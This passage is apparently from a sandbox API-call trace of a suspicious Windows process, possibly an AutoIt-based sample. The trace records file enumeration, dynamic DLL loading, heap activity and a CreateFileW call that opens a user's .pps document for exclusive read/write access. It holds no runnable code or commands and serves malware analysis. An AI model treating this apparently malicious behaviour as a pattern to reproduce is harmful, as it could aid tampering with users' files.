lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb60d02d0, ftCreationTime.dwHighDateTime=0x1d5e110, ftLastAccessTime.dwLowDateTime=0xa4489aa0, ftLastAccessTime.dwHighDateTime=0x1d5e417, ftLastWriteTime.dwLowDateTime=0xa4489aa0, ftLastWriteTime.dwHighDateTime=0x1d5e417, nFileSizeHigh=0x0, nFileSizeLow=0x137a4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Im NPo61DTLm5sBx.pps", cAlternateFileName="IMNPO6~1.PPS")) returned 0x90ae18 [0170.811] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0170.812] CharLowerBuffW (in: lpsz="byte[79780]", cchLength=0xb | out: lpsz="byte[79780]") returned 0xb [0170.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0170.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0170.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0170.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0170.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0170.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0170.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0170.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0170.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0170.813] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0170.813] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0170.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0170.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0170.813] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0170.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0170.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0170.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0170.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2828 [0170.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2828, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0170.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0170.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0170.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0170.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0170.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0170.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0170.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0170.814] FreeLibrary (hLibModule=0x75c90000) returned 1 [0170.814] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0170.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0170.814] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.814] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0170.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0170.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0170.814] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0170.814] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0170.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0170.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0170.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0170.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0170.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0170.815] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0170.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0170.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0170.815] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0170.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0170.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0170.815] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0170.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0170.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0170.815] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0170.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0170.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0170.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0170.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0170.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0170.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0170.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0170.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0170.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0170.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0170.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0170.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0170.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0170.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0170.817] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0170.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0170.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0170.817] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0170.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0170.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0170.817] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0170.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0170.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0170.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0170.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0170.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0170.817] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0170.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0170.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0170.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0170.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0170.818] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0170.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0170.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0170.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0170.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0170.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba618, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0170.819] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\im npo61dtlm5sbx.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0170.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0170.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0170.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0170.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0170.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0170.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0170.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0170.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0170.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0170.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0170.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0170.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0170.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0170.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0170.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0170.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0170.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6b008 | out: hHeap=0x8a0000) returned 1 [0170.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0170.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0170.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0170.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0170.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0170.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0170.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0170.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0170.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0170.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0170.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0170.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0170.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0170.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0170.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0170.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0170.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0170.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0170.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0170.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0170.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0170.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0170.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0170.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0170.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0170.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0170.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0170.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0170.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0170.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0170.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0170.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0170.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0170.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0170.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0170.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0170.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0170.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0170.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0170.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0170.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0170.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0170.822] FreeLibrary (hLibModule=0x75990000) returned 1 [0170.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0170.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0170.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0170.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0170.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0170.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0170.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0170.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0170.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0170.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0170.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0170.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0170.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0170.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0170.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0170.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0170.823] PeekMessageW (in: lpMsg=0x87ee3c, 